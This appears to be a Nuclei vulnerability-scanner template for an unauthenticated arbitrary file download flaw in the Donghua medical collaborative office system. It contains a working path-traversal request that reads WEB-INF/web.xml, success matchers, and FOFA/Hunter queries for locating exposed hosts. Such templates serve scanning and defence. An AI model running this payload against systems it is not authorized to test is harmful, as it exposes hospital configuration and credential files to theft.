id: donghua-templateFile-filedownload
info:
  name: 东华医疗协同办公系统 templateFile - 任意文件下载漏洞
  author: leadlife
  severity: high
  description: 东华医疗协同办公系统 templateFile 存在任意文件读取漏洞，未经身份验证攻击者可通过该漏洞读取系统重要文件（如数据库配置文件、系统配置文件）、数据库配置文件等等，导致网站处于极度不安全状态。
  reference: 
    - https://github.com/wy876/POC/blob/c19942e30121f116548ca14c0375ba6c8560afeb/%E4%B8%9C%E5%8D%8E%E5%8C%BB%E7%96%97%E5%8D%8F%E5%90%8C%E5%8A%9E%E5%85%AC%E7%B3%BB%E7%BB%9FtemplateFile%E5%AD%98%E5%9C%A8%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8B%E8%BD%BD%E6%BC%8F%E6%B4%9E.md
  metadata:
    verified: true
    fofa-query: body="东华医疗协同办公系统"
    hunter-query: web.body="东华医疗协同办公系统"
  tags: donghua,filedownload

http:
  - raw:
      - |
        GET /common/templateFile?template_name=../../WEB-INF/web.xml HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body,'xml','BizFocus')
        condition: and